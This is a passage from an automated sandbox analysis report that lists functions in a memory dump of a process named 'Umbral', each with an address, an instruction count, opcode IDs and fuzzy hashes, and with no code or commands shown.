                                        • Instruction Fuzzy Hash: 76513632C0DA994FE765B7349C155EDBBE0FF46390F8501BAD45CC70A3DB29291A8782
                                        Function 00007FF848E91E99 Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d032b1493500f0c1f2fb3eeb0c07992e9c02cf14409366be94ced089006534b8
                                        • Instruction ID: 2ee567c3875640b5500124fbcf70378efd2e30ed1735bb15800c1514b1188362
                                        • Opcode Fuzzy Hash: d032b1493500f0c1f2fb3eeb0c07992e9c02cf14409366be94ced089006534b8
                                        • Instruction Fuzzy Hash: E951143280DA8A8FE765A77458152F97BE0FF46394F0501FAD45CC7093EB6D291A8386
                                        Function 00007FF848E83617 Relevance: .2, Instructions: 212COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bc696e7200f74767e17e51cd10e95e0d7390df5e78578f0e182f6470e615b43
                                        • Instruction ID: a57647cfd23874b57670ca9177029511e631757b9036bcbc5120aab53b01a184
                                        • Opcode Fuzzy Hash: 3bc696e7200f74767e17e51cd10e95e0d7390df5e78578f0e182f6470e615b43
                                        • Instruction Fuzzy Hash: AC710F34618A4E8FDBC8EF1CC494AA973E2FF58344F6455A8D41DC729ADB35E852CB40
                                        Function 00007FF848E7D629 Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8eba5d3c363b362daf2b8504b41dab66d20b8644b8fbca83460f2222f83d33e
                                        • Instruction ID: 9c68dd8313390451a35b197c0b38a541570c2bc982fc4792dec5ea64a89b2b9c
                                        • Opcode Fuzzy Hash: e8eba5d3c363b362daf2b8504b41dab66d20b8644b8fbca83460f2222f83d33e
                                        • Instruction Fuzzy Hash: 24617C30608A4E8FDB85EF1CC894AE9B3E1FF5D784F5142A5E419CB296CF35E8528B44
                                        Function 00007FF848E8A6C8 Relevance: .2, Instructions: 208COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00ea4d21a7d91bd55f3d4d7769bc8f031fc3a16fa3a6056c4750e01e5f5d96df
                                        • Instruction ID: 6b2364d8bcfbcf8ad131c18e6f9947dd032ffe7d173de48ba160446eea5c7298
                                        • Opcode Fuzzy Hash: 00ea4d21a7d91bd55f3d4d7769bc8f031fc3a16fa3a6056c4750e01e5f5d96df
                                        • Instruction Fuzzy Hash: 1251A671B1C71C4F9B58AA5CA8461BD77E1FB99721F10023FE88AC3211DB31B85386C6
                                        Function 00007FF848E8A280 Relevance: .2, Instructions: 207COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47cb0aedc0f619e98855db28b9bc44f580226af7c42fbc64ff821ed523e3a2a5
                                        • Instruction ID: 9300d69474dbbf76336974a0fa99e6b04ee5f65a4c0f9c104c5c52faf5c769de
                                        • Opcode Fuzzy Hash: 47cb0aedc0f619e98855db28b9bc44f580226af7c42fbc64ff821ed523e3a2a5
                                        • Instruction Fuzzy Hash: 39516E3060CB099FDB98EB18D448A7577E1FF99750F1401BAE44EC72A6DF25AC828745
                                        Function 00007FF848E8A258 Relevance: .2, Instructions: 205COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 958046964c91ce370a669294efcdff9d9485367135d98b2882c4e78e32e6502f
                                        • Instruction ID: ebaf898d96d98ea1da1216f0134bbb8a687dcb9361db3952e16664d43d007a1d
                                        • Opcode Fuzzy Hash: 958046964c91ce370a669294efcdff9d9485367135d98b2882c4e78e32e6502f
                                        • Instruction Fuzzy Hash: 5D511531B1DE494FE794FB2C885827577D2FFA8391B1841BAD00EC72A6DE35AC428744
                                        Function 00007FF848E88A38 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39266b3785dfb746fa438e2156bf44d2a029aa3118486974fc762ff2aeac381c
                                        • Instruction ID: 0fb8bdceab89d96b1e237bf8d060cddf72f6acb2938e50589ac42a4568570513
                                        • Opcode Fuzzy Hash: 39266b3785dfb746fa438e2156bf44d2a029aa3118486974fc762ff2aeac381c
                                        • Instruction Fuzzy Hash: EB518A70A1CA498FDB98EE28D094A7673E1FBA8340F50017EE44FC76A6DE35E8428745
                                        Function 00007FF848E70E70 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eeebdc96ce5a5ac87fe8098306afca85a5693a1bc134484ba576649433ebf87
                                        • Instruction ID: b9483a9fab75d75b97f3e3da1be1a55be261b29508262e86a4a42cd1d39a1986
                                        • Opcode Fuzzy Hash: 4eeebdc96ce5a5ac87fe8098306afca85a5693a1bc134484ba576649433ebf87
                                        • Instruction Fuzzy Hash: FE518331E0CA4A8FEB58EB6898556BDB7F2FF98350F14017AD04DE3282DF3968028755
                                        Function 00007FF848E713ED Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbe1c1b817a081b53558bd9a94c4afe31f8b1e8f76155cad6584109dbe5b75ee
                                        • Instruction ID: 8e5d6679f987801452fc6affeb006e31ed423b4cc45af9bf41ce9842cee494d3
                                        • Opcode Fuzzy Hash: fbe1c1b817a081b53558bd9a94c4afe31f8b1e8f76155cad6584109dbe5b75ee
                                        • Instruction Fuzzy Hash: 0771E830D0965D8FEB84FBA8C8656ECBBB1FF59344F5000A9D409EB292CF796885CB00
                                        Function 00007FF848E81670 Relevance: .2, Instructions: 191COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86f798def88138d2c1a9403d1fa9647402e315ea5445b4c7c1c0af274e250de1
                                        • Instruction ID: 5f27fd18ed50fbad97bf3101bb13d28a1342be034ab2ad59828bfc41a53c9653
                                        • Opcode Fuzzy Hash: 86f798def88138d2c1a9403d1fa9647402e315ea5445b4c7c1c0af274e250de1
                                        • Instruction Fuzzy Hash: E451E831E0DE4A4FEB58E66C94556B9B7E1FF99B80F0801BAD00DD3296DE396C018355
                                        Function 00007FF848E815C8 Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19cd47c98aed1d1509e09962970af1153975fa47a990fc23702a1ddadd9a4c0e
                                        • Instruction ID: 1b1cf05da241c357c5c9d91aa090f0fcca0a07c0d68b3c8bd5cbdad796576ca0
                                        • Opcode Fuzzy Hash: 19cd47c98aed1d1509e09962970af1153975fa47a990fc23702a1ddadd9a4c0e
                                        • Instruction Fuzzy Hash: 78513731B0CA054FE758EA2C8812539B7D2FF8A794F14027ED49AC72C6DE34AC428386
                                        Function 00007FF848E87DAD Relevance: .2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b227d7238ed186155110e8e01e6bb54000c5d673c9d8e8e8aa1a7af7e67cdcaf
                                        • Instruction ID: 315236eaffd8909214277bd51fcc24791e0c4406f73f8ab7cf8e1dbed6ad0eb5
                                        • Opcode Fuzzy Hash: b227d7238ed186155110e8e01e6bb54000c5d673c9d8e8e8aa1a7af7e67cdcaf
                                        • Instruction Fuzzy Hash: D1514631B0CA454FE758EB2C8815539B7D2EF9A794F1402BED49AC72D7DE34AC428386
                                        Function 00007FF848EC1C90 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dccde64c85ebb6e06aaf72ff0159e62ed6bbe62a373e74d727ff7c4d3bb972de
                                        • Instruction ID: 6c7906ae4cb34bc84e9e53a4fadd39d5361c2ebc11c2a0792f8ed9a555a269ee
                                        • Opcode Fuzzy Hash: dccde64c85ebb6e06aaf72ff0159e62ed6bbe62a373e74d727ff7c4d3bb972de
                                        • Instruction Fuzzy Hash: 7F518B21E1CD0A5FEB9CFA18949567527D1FF99381F0441BED10DC72C6DF2AAC41C688
                                        Function 00007FF848E77230 Relevance: .2, Instructions: 183COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92d868184730c5f174bc99b5fd978956bd3878e7082697ae141be80b8dd9a1af
                                        • Instruction ID: cd3a55b4d973447e72687ced80ae337ca2b7d29096e13789ba18f8b3e87b33c5
                                        • Opcode Fuzzy Hash: 92d868184730c5f174bc99b5fd978956bd3878e7082697ae141be80b8dd9a1af
                                        • Instruction Fuzzy Hash: 6151373290D6D94EE762A73458115F97BA0FF433A0F4802BBD099C70E3DE2A650A8796
                                        Function 00007FF848E89A02 Relevance: .2, Instructions: 178COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40346c7144c4b1e1c2f7795f605c88fcf05ba62e1281a3c7c70c326e7b8c35e0
                                        • Instruction ID: 49d4691e32cb1a6d14731544190a53f42db3982a5889309b8feabcfc75ed7d67
                                        • Opcode Fuzzy Hash: 40346c7144c4b1e1c2f7795f605c88fcf05ba62e1281a3c7c70c326e7b8c35e0
                                        • Instruction Fuzzy Hash: 02510332D0DA9A4FE766B73458161E97BE0FF46390F8901FBD54CCB093DA28580A8796
                                        Function 00007FF848EBC470 Relevance: .2, Instructions: 173COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64a8e4a36e48ba8811c5722c7811da7a8adffe87605080797bf36f4b0a05118f
                                        • Instruction ID: 4262e81f6fafc3641ad21d76dfa7772486f9251e700c6e34589b4f7e885485ce
                                        • Opcode Fuzzy Hash: 64a8e4a36e48ba8811c5722c7811da7a8adffe87605080797bf36f4b0a05118f
                                        • Instruction Fuzzy Hash: EA519031A1CF068FEB68EA1A9441A76B3D1FFA8390F40057ED49AC3691DF39F8418785
                                        Function 00007FF848E7F2FA Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf58e241a95e5905c58ea7e2bbfcc0e691acba2076d1c9c87113f89d46f3b892
                                        • Instruction ID: d16f6279f2d6997ba65d4c026ddb274ea0fabccf1aa512708707d3dd2ac78a35
                                        • Opcode Fuzzy Hash: cf58e241a95e5905c58ea7e2bbfcc0e691acba2076d1c9c87113f89d46f3b892
                                        • Instruction Fuzzy Hash: 2E51B031A0EE4E9FE759EB78C4245A87BB1FF4A385B1405FAD009DB2A3DE366841C750
                                        Function 00007FF848E70A38 Relevance: .2, Instructions: 160COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b6a3a78dc25997530b84330c081b7375f6c7f80811fffe8f4fc330a4dfb1ae4
                                        • Instruction ID: 0cd7791629e26992c3e16ba0f605e401ede769bb4e48857d228823c67eeaa4a9
                                        • Opcode Fuzzy Hash: 3b6a3a78dc25997530b84330c081b7375f6c7f80811fffe8f4fc330a4dfb1ae4
                                        • Instruction Fuzzy Hash: D6515170A18A4E8FDB85FF58C8446EA73F1FF58340F504A69E429C7295CB35E851CB80
                                        Function 00007FF848E84B39 Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 341fec1bc0f6b364b2a8e948d1a0faf6edbe3ccda58a5db379ceb14c2aec6d0a
                                        • Instruction ID: 822642a1b34e229b2aaee3836222076aba86dd13d6b66f0215560bb612441a74
                                        • Opcode Fuzzy Hash: 341fec1bc0f6b364b2a8e948d1a0faf6edbe3ccda58a5db379ceb14c2aec6d0a
                                        • Instruction Fuzzy Hash: 7B418C30B08E4A8FDB89EF2CC454AA977E2FF9A344B5045A9D00AC72E6CE35EC45C744
                                        Function 00007FF848E904C0 Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f569122615ba27bf57a49fcd86b2de9679433e56deb536dd69c57e803dcd666
                                        • Instruction ID: b214933c2bda5451f27f64025ccd77ca0764a44e3d115b7f2490321564cf0089
                                        • Opcode Fuzzy Hash: 0f569122615ba27bf57a49fcd86b2de9679433e56deb536dd69c57e803dcd666
                                        • Instruction Fuzzy Hash: 28412230A0DB894FE75ABB7C98104B6BBF0FF4A350B0945EED089C7193DE29A846C355
                                        Function 00007FF848E72E19 Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12bdd295b222e8b868362a5b4e17ca67bf98123db6dd116c73caa5c701f61a60
                                        • Instruction ID: f81e0a6959037cbc25ea452010ee092359e6d328a69d5dc4c0295cd5a13319e1
                                        • Opcode Fuzzy Hash: 12bdd295b222e8b868362a5b4e17ca67bf98123db6dd116c73caa5c701f61a60
                                        • Instruction Fuzzy Hash: 53410731A1DB495FE71DB73C9816175B7D1EF8A750F0442BEE449C32A3DE24BC42829A
                                        Function 00007FF848EC45F0 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 557dfbb7afccf681e585bee9f76790ab4766c1931d9fc645f09fceae7a180b31
                                        • Instruction ID: 90d182a118e2b1102b113d01136c546eeeb44b3540ea6400b36eed4facd1a1cc
                                        • Opcode Fuzzy Hash: 557dfbb7afccf681e585bee9f76790ab4766c1931d9fc645f09fceae7a180b31
                                        • Instruction Fuzzy Hash: B1517031D1CB969FE7A8E629C088BA777D1FF55354F0845BCC08A836A2D778E885C344
                                        Function 00007FF848E8BCC0 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b51a488f460e8659b07cb2ce4287f2fde623e836a66340e4c7f15315a375592
                                        • Instruction ID: 244f83f785afbbafb3651fb63c22c97e3863a334e1af92043aed1c9f529a11b5
                                        • Opcode Fuzzy Hash: 6b51a488f460e8659b07cb2ce4287f2fde623e836a66340e4c7f15315a375592
                                        • Instruction Fuzzy Hash: C8412321B1C94B4FE798FA7C885567533D1FF55388F5845B9D48EC3286EF68E8028784
                                        Function 00007FF848E86E20 Relevance: .2, Instructions: 150COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8483b0572047b527ebbbe73d11ec6dd7408c2038b3330554c3a42a03ed50e8ab
                                        • Instruction ID: d5c17ef008f767570f0ce8b769b16c1635824f8f6572c1d1ef075fe285486776
                                        • Opcode Fuzzy Hash: 8483b0572047b527ebbbe73d11ec6dd7408c2038b3330554c3a42a03ed50e8ab
                                        • Instruction Fuzzy Hash: 62319C31B1D9094FE759B62CB49D1BE77C0EF893A4F5409BBE40DC32A6EE25684382C5
                                        Function 00007FF848E8B918 Relevance: .1, Instructions: 149COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 087308a36155dd321a9899f02f7615d3796855601bce5ee404d929a4b97719ea
                                        • Instruction ID: bc7201f264f0646cda9804e3fccb1dda0f593a76d35a94aaf767cd8a8ee20e24
                                        • Opcode Fuzzy Hash: 087308a36155dd321a9899f02f7615d3796855601bce5ee404d929a4b97719ea
                                        • Instruction Fuzzy Hash: 0741DEA0E0C92A4EEBACE6299448B7123D2FF98251F540279E00EC75C5DF3AE8C1A304
                                        Function 00007FF848E71B55 Relevance: .1, Instructions: 149COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e264efd24982883083cc09c81f281846d8b62e355f1aeee41e7fed3817e6584
                                        • Instruction ID: 21d3a2eaabe1da05faa0ace8f271bff49c591f9421aa3fafa8dae62b180a7438
                                        • Opcode Fuzzy Hash: 8e264efd24982883083cc09c81f281846d8b62e355f1aeee41e7fed3817e6584
                                        • Instruction Fuzzy Hash: 3C515E70A0CB8A8FDB8DEF188865A6537A1FF59344F1405ADD45DC72D2CB36E812C749
                                        Function 00007FF848E8A298 Relevance: .1, Instructions: 145COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96fc9833952561a644c033bd59f860723af98212c0dccb5e499a70cce2b37285
                                        • Instruction ID: 1dc7591f17497ba100d9f5a2f23a23595361ebba7247065f116c519c005d3d46
                                        • Opcode Fuzzy Hash: 96fc9833952561a644c033bd59f860723af98212c0dccb5e499a70cce2b37285
                                        • Instruction Fuzzy Hash: A0312731B1DA0D5FE398F62C98456B5B7D1FF893A0F4451BAD00EC3283DE25AC528784
                                        Function 00007FF848E76CCD Relevance: .1, Instructions: 143COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2379d27406d16dc63676212d7c5b4ab6346fe1869b8f6120c6a4894b2be2e767
                                        • Instruction ID: e78c11f55088dd9158c80a5253187c97976933102f136af5177baa172220907f
                                        • Opcode Fuzzy Hash: 2379d27406d16dc63676212d7c5b4ab6346fe1869b8f6120c6a4894b2be2e767
                                        • Instruction Fuzzy Hash: AC417B31A1C94A8FEB88FB28C855ABABBA1FF49340F5500B9D00AC72E3CF346841C755
                                        Function 00007FF848E799CE Relevance: .1, Instructions: 142COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93b98aeaf3f2877b17930c4b49bf983f0b0751bd51af5d7ab031f706b955fde9
                                        • Instruction ID: f01a5b34a891ab449191644f18deea9a1e5a8c44ae76ce396ae183d427f88587
                                        • Opcode Fuzzy Hash: 93b98aeaf3f2877b17930c4b49bf983f0b0751bd51af5d7ab031f706b955fde9
                                        • Instruction Fuzzy Hash: F7417300A4FD4E1FE64AB678A1152BC2193DF99B80F251478D19DD25CBEE3D6D019345
                                        Function 00007FF848E77D5D Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d75c6f86a4922590c574c55affb2bb5036ea0475bfe2745511e2f26088229217
                                        • Instruction ID: 71c82d1065d4a0a461254588738128efc9a707788d2ae3b5e7f0ab4746c1a374
                                        • Opcode Fuzzy Hash: d75c6f86a4922590c574c55affb2bb5036ea0475bfe2745511e2f26088229217
                                        • Instruction Fuzzy Hash: E9417C3190DA8A4FE745EB68C8156AABBF1FF5A350F4901FAD049CB1A3CF286C46C751
                                        Function 00007FF848E77EC1 Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d2f6c0cf06356f2e0acc2bb534314d359637eb3b58db884df0fa66a0a3c4cfe
                                        • Instruction ID: cdafc5bdeef1efc61b780a3d82c052153ab0b079388b2e0947059508222b0b2a
                                        • Opcode Fuzzy Hash: 1d2f6c0cf06356f2e0acc2bb534314d359637eb3b58db884df0fa66a0a3c4cfe
                                        • Instruction Fuzzy Hash: 7941AC31A1CA5A4FEB44FB6898116FA77B0FF89380F4401B6D40DE71A3CF2869018365
                                        Function 00007FF848E77388 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83ad33577df12bb966ac56a9c4dd6a3ee8610c3a67f7c57bc6b97bb1d42a0f3c
                                        • Instruction ID: c1bd6b33ae82d5ec1a106ea689cabc3566c9d166a535ecb3d05d2421f0b68fb4
                                        • Opcode Fuzzy Hash: 83ad33577df12bb966ac56a9c4dd6a3ee8610c3a67f7c57bc6b97bb1d42a0f3c
                                        • Instruction Fuzzy Hash: FB313732A1EB495FE71976786C160B53BD1FF46795F0401BFE489C3193EF296802839A
                                        Function 00007FF848E773A0 Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
